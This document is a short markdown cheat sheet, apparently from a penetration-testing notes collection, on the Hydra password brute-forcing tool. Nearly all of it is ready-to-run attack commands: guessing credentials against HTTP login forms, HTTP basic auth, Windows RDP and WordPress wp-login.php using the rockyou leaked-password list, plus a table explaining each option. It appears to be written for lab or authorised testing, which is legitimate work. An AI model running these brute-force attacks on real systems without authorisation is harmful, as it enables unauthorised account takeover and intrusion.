killchain-compendium/hashes/password_cracking/hydra.md

1.5 KiB

Hydra usage

Examples

  • HTTP post form
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
  • HTTP basic auth
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
Command Description
hydra -P <wordlist> -v <ip> <protocol> Brute force against a protocol of your choice
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> Attack a Windows Remote Desktop with a password list.
hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Craft a more specific request for Hydra to brute force.

Parameter

Option Decription
-l Single username
-P Indicates use the following wordlist
http-post-form indicates the method
/login url the login URL
:username the form field where the username is entered
^USER^ tells Hydra to use the username from -l
password the formfield where the password is entered
^PASS^ tells Hydra to use the wordlist from -P
Login indicates to Hydra the login failed message
Login failed is the login failure message that the form returns
F=incorrect If this word appears on the page, login failed
-V verbose